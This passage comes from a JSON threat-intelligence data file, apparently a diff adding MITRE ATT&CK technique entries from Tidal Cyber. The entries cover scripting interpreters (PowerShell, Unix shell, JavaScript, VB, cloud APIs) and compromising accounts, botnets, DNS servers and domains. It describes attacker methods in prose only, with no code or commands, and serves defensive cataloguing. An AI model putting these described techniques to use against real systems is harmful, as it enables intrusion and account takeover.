Shells, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) modules like Azure for PowerShell[[Microsoft - Azure PowerShell](https://app.tidalcyber.com/references/3b17b649-9efa-525f-aa49-cf6c9ad559d7)], or software developer kits (SDKs) available for languages such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65). \n\nCloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.\n\nWith proper permissions (often via use of credentials such as [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc) and [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.009" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "af798e80-2cc5-5452-83e4-9560f08bf2d5", + "value": "Cloud API" + }, + { + "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.[[NodeJS](https://app.tidalcyber.com/references/af710d49-48f4-47f6-98c6-8d4a4568b020)]\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) and Internet Explorer HTML Application (HTA) pages.[[JScrip May 2018](https://app.tidalcyber.com/references/99e48516-f918-477c-b85e-4ad894cc031f)][[Microsoft JScript 2007](https://app.tidalcyber.com/references/e3c97d0f-150e-4fe3-a4ce-fc146a2fa718)][[Microsoft Windows Scripts](https://app.tidalcyber.com/references/9e7cd4da-da18-4d20-809a-19abb4352807)]\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.[[Apple About Mac Scripting 2016](https://app.tidalcyber.com/references/d2f32ac1-9b5b-408d-a7ab-d92dd9efe0ed)][[SpecterOps JXA 2020](https://app.tidalcyber.com/references/d9b6bb05-6ab4-4f5e-9ef0-f3e0cc97ce29)][[SentinelOne macOS Red Team](https://app.tidalcyber.com/references/4b05bd7c-22a3-4168-850c-8168700b17ba)][[Red Canary Silver Sparrow Feb2021](https://app.tidalcyber.com/references/f08a856d-6c3e-49e2-b7ba-399831c637e5)][[MDSec macOS JXA and VSCode](https://app.tidalcyber.com/references/979cac34-d447-4e42-b17e-8ab2630bcfec)]\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.007" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "8a669da8-8894-4fb0-9124-c3c8418985cc", + "value": "JavaScript" + }, + { + "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.008" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "284bfbb3-99f0-4c3d-bc1f-ab74065b7907", + "value": "Network Device CLI" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.[[TechNet PowerShell](https://app.tidalcyber.com/references/20ec94d1-4a5c-43f5-bb65-f3ea965d2b6e)] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207), [PowerSploit](https://app.tidalcyber.com/software/82fad10d-c921-4a87-a533-49def83d002b), [PoshC2](https://app.tidalcyber.com/software/a3a03835-79bf-4558-8e80-7983aeb842fb), and PSAttack.[[Github PSAttack](https://app.tidalcyber.com/references/929e37ed-c230-4517-a2ef-b7896bd3e4a2)]\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).[[Sixdub PowerPick Jan 2016](https://app.tidalcyber.com/references/52190592-5809-4e7b-a19c-fc87b245025c)][[SilentBreak Offensive PS Dec 2015](https://app.tidalcyber.com/references/8eec1af3-c65e-4522-8087-73122ac6c281)][[Microsoft PSfromCsharp APR 2014](https://app.tidalcyber.com/references/83e346d5-1894-4c46-98eb-88a61ce7f003)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.001" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "6ca7838a-e8ad-43e8-9da6-15b640d1cbde", + "value": "PowerShell" + }, + { + "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.006" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "68fed1c9-e060-4c4d-83d9-d8c817893d65", + "value": "Python" + }, + { + "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.[[DieNet Bash](https://app.tidalcyber.com/references/c5b362ce-6bae-46f7-b047-e3a0b2bf2580)][[Apple ZShell](https://app.tidalcyber.com/references/5374ad8e-96a2-4d19-b2cf-28232fa97b52)] Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.004" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "3eafcd8b-0cb8-4d23-8785-3f80a3c897c7", + "value": "Unix Shell" + }, + { + "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) and the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.[[VB .NET Mar 2020](https://app.tidalcyber.com/references/da6d1b56-8e59-4125-b318-48a40a1c8e94)][[VB Microsoft](https://app.tidalcyber.com/references/b23a1a5d-48dd-4346-bf8d-390624214081)]\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.[[Microsoft VBA](https://app.tidalcyber.com/references/ba0e3c5d-7934-4ece-b4a1-c03bc355f378)][[Wikipedia VBA](https://app.tidalcyber.com/references/70818420-c3ec-46c3-9e97-d8f989f2e3db)] VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).[[Microsoft VBScript](https://app.tidalcyber.com/references/5ea8d8c7-8039-4210-967a-a4dcd566bf95)]\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) payloads (which may also involve [Mark-of-the-Web Bypass](https://app.tidalcyber.com/technique/7ee64e42-6d3b-47f8-a2a9-55263537bd51) to enable execution).[[Default VBS macros Blocking ](https://app.tidalcyber.com/references/d86883dd-3766-4971-91c7-b205ed13cc37)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.005" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "0340ed34-6db2-4979-bf73-2c16855867b4", + "value": "Visual Basic" + }, + { + "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).[[SSH in Windows](https://app.tidalcyber.com/references/3006af23-b802-400f-841d-7eea7d748d28)]\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) to execute various commands and payloads. Common uses include [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) to execute a single command, or abusing [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) interactively with input and output forwarded over a command and control channel.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.003" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "be095bcc-4769-4010-b2db-3033d01efdbe", + "value": "Windows Command Shell" + }, + { + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7) while Windows installations include the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).\n\nThere are also cross-platform interpreters such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65), as well as those commonly associated with client applications such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) in order to achieve remote Execution.[[Powershell Remote Commands](https://app.tidalcyber.com/references/24c526e1-7199-45ca-99b4-75e75c7041cd)][[Cisco IOS Software Integrity Assurance - Command History](https://app.tidalcyber.com/references/dbca06dd-1184-4d52-9ee8-b059e368033c)][[Remote Shell Execution in Python](https://app.tidalcyber.com/references/4ea54256-42f9-4b35-8f9e-e595ab9be9ce)]", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "9f06ef9b-d587-41d3-8fc8-7d539dac5701", + "type": "similar" + }, + { + "dest-uuid": "af798e80-2cc5-5452-83e4-9560f08bf2d5", + "type": "similar" + }, + { + "dest-uuid": "8a669da8-8894-4fb0-9124-c3c8418985cc", + "type": "similar" + }, + { + "dest-uuid": "284bfbb3-99f0-4c3d-bc1f-ab74065b7907", + "type": "similar" + }, + { + "dest-uuid": "6ca7838a-e8ad-43e8-9da6-15b640d1cbde", + "type": "similar" + }, + { + "dest-uuid": "68fed1c9-e060-4c4d-83d9-d8c817893d65", + "type": "similar" + }, + { + "dest-uuid": "3eafcd8b-0cb8-4d23-8785-3f80a3c897c7", + "type": "similar" + }, + { + "dest-uuid": "0340ed34-6db2-4979-bf73-2c16855867b4", + "type": "similar" + }, + { + "dest-uuid": "be095bcc-4769-4010-b2db-3033d01efdbe", + "type": "similar" + } + ], + "uuid": "a2184d53-63b1-4c40-81ed-da799080c36c", + "value": "Command and Scripting Interpreter" + }, + { + "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "0783c499-1564-4062-addc-f1ff86ef4e59", + "value": "Communication Through Removable Media" + }, + { + "description": "Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://app.tidalcyber.com/technique/ce886c55-17ab-4c1c-90dc-3aa93e69bdb4) or to [Upload Tool](https://app.tidalcyber.com/technique/d7594eaf-286f-4484-94fa-8608c911767a)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23)s or [Serverless](https://app.tidalcyber.com/technique/c30faf84-496b-4f27-a4bc-aa36d583c69f) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.[[Awake Security C2 Cloud](https://app.tidalcyber.com/references/fa3762ce-3e60-4991-b464-12601d2a6912)]\n\nA variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, conducting [Password Spraying](https://app.tidalcyber.com/technique/e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a) attacks, or attempting to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s.[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)] Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) between service providers and their customers.[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1586.003" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "4b187604-88ab-4972-9836-90a04c705e10", + "value": "Cloud Accounts" + }, + { + "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)][[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)] Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1586.002" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "49ae7bf1-a313-41d6-ad4c-74efc4c80ab6", + "value": "Email Accounts" + }, + { + "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)] Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)][[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)] Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1586.001" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "3426077d-3b9c-4f77-a1c6-d68f0dea670e", + "value": "Social Media Accounts" + }, + { + "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)][[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)] Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + }, + { + "dest-uuid": "4b187604-88ab-4972-9836-90a04c705e10", + "type": "similar" + }, + { + "dest-uuid": "49ae7bf1-a313-41d6-ad4c-74efc4c80ab6", + "type": "similar" + }, + { + "dest-uuid": "3426077d-3b9c-4f77-a1c6-d68f0dea670e", + "type": "similar" + } + ], + "uuid": "c6374cbe-799a-4648-b1e2-2a66bb42d3f3", + "value": "Compromise Accounts" + }, + { + "description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)[[Unit42 Banking Trojans Hooking 2022](https://app.tidalcyber.com/references/411c3df4-08e6-518a-953d-19988b663dc4)] prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.[[ESET FontOnLake Analysis 2021](https://app.tidalcyber.com/references/dbcced87-91ee-514f-98c8-29a85d967384)]\n\nSince these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "05435e33-05fe-4a41-b8e4-694d45eb9147", + "value": "Compromise Client Software Binary" + }, + { + "description": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.[[Norton Botnet](https://app.tidalcyber.com/references/f97427f1-ea16-4e92-a4a2-4d62a800df15)] Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.[[Imperva DDoS for Hire](https://app.tidalcyber.com/references/86f87ec6-058e-45a7-9314-0579a2b4e8f2)] Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)] With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or Distributed Denial of Service (DDoS).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1584.005" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "66caa162-711c-44ac-b96d-0552cf328f84", + "value": "Botnet" + }, + { + "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)][[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)] Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)][[Crowdstrike DNS Hijack 2019](https://app.tidalcyber.com/references/969ad6de-9415-464d-ba52-2e61e1814a92)] Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.[[CiscoAngler](https://app.tidalcyber.com/references/0b10d7d4-9c18-4fd8-933a-b46e41d618ab)][[Proofpoint Domain Shadowing](https://app.tidalcyber.com/references/4653a9a5-95f1-4b02-9bf0-8f1b8cd6c059)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1584.002" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "83e4f633-67fb-4d87-b1b3-8a7a2e60778b", + "value": "DNS Server" + }, + { + "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)] Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.[[Krebs DNS Hijack 2019](https://app.tidalcyber.com/references/9bdc618d-ff55-4ac8-8967-6039c6c24cb1)]\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.[[Microsoft Sub Takeover 2020](https://app.tidalcyber.com/references/b8005a55-7e77-4dc1-abed-f75a0a3d8afb)]\n\nAdversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.[[Palo Alto Unit 42 Domain Shadowing 2022](https://app.tidalcyber.com/references/ec460017-fd25-5975-b697-c8c11fee960d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1584.001" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "581722ea-81a5-4c73-a703-2c994f1cf814", + "value": "Domains" + }, + { + "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://app.tidalcyber.com/technique/6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2) or [Virtual Private 